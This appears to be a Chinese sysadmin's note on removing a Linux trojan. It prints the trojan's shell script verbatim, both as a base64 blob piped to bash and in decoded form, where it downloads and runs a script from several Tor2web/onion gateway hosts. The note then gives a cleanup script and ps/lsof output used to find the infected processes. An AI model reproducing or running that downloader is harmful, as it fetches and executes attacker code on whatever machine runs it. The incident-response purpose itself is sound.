木马解决
木马文件
#!/bin/bash
exec &>/dev/null
sleep 167
echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KdD00Y2M0Zng3N2I3dmh4djVhCnUoKSB7Cng9L2Nybgp3Z2V0IC10MSAtVDE4MCAtcVUtIC1PL
SAtLW5vLWNoZWNrLWNlcnRpZmljYXRlICQxJHggfHwgY3VybCAtbTE4MCAtZnNTTGtBLSAkMSR4Cn0KaWYgISBscyAvcHJvYy8kKGNhdCAvdG1wLy5YMTEtdW5peC8wKS9pbzsgdGhlbgooCnUgJHQudG9yMndlYi5pbyB8fAp1ICR0Lm9uaW9uLmdsYXNzIHx8CnUgJHQub25
pb24ubW4gfHwKdSAkdC50b3Iyd2ViLnRvIHx8CnUgJHQub25pb24ud3MgfHwKdSAkdC5vbmlvbi5pbi5uZXQgfHwKdSAkdC5vbmlvbi50bwopfGJhc2gKZmkK|base64 -d|bash
exec &>/dev/null
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
t=4cc4fx77b7vhxv5a
u() {
x=/crn
wget -t1 -T180 -qU- -O- --no-check-certificate $1$x || curl -m180 -fsSLkA- $1$x
}
if ! ls /proc/$(cat /tmp/.X11-unix/0)/io; then
(
u $t.tor2web.io ||
u $t.onion.glass ||
u $t.onion.mn ||
u $t.tor2web.to ||
u $t.onion.ws ||
u $t.onion.in.net ||
u $t.onion.to
)|bash
fi
清除木马的命令
[root@ci ~]# cat qingchu.sh
#!/bin/bash
kill -9 $(cat /tmp/.X11-unix/*)
rm -rf /tmp/.X11-unix/*
sed -i '/systemd-init/d' /var/spool/cron/root
rm -rf /etc/cron.d/0systemd
rm -rf /usr/lib/systemd/systemd-init
rm -rf /lib/systemd/systemd-init
rm -rf /root/.systemd-init
杀掉木马进程
使用
ps -lef
找出可疑的进程
例如
1 S root 964 1 0 80 0 - 557 hrtime Oct03 ? 00:00:04 wdQbhA
1 S root 67000 1 0 80 0 - 557 hrtime Oct03 ? 00:00:03 0fvpPD
1 S root 1963 1 0 80 0 - 557 hrtime Aug28 ? 00:00:05 fvInxF
1 S root 127292 1 99 80 0 - 20051 futex_ 18:16 ? 2-15:45:17 1GUo01
查看这些进程是怎样启动的,通过什么启动的
[root@ci ~]# lsof -p 1963
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
fvInxF 1963 root cwd DIR 8,2 4096 67108929 /root
fvInxF 1963 root rtd DIR 8,2 4096 64 /
fvInxF 1963 root txt REG 8,2 20972 68875717 /root/597ea2f6238a0d2d5f451b89eaf270e3 (deleted)
fvInxF 1963 root 0w REG 8,2 5 202855197 /tmp/.X11-unix/0 (deleted)
[root@ci ~]# bash -x qingchu.sh
杀掉这些进程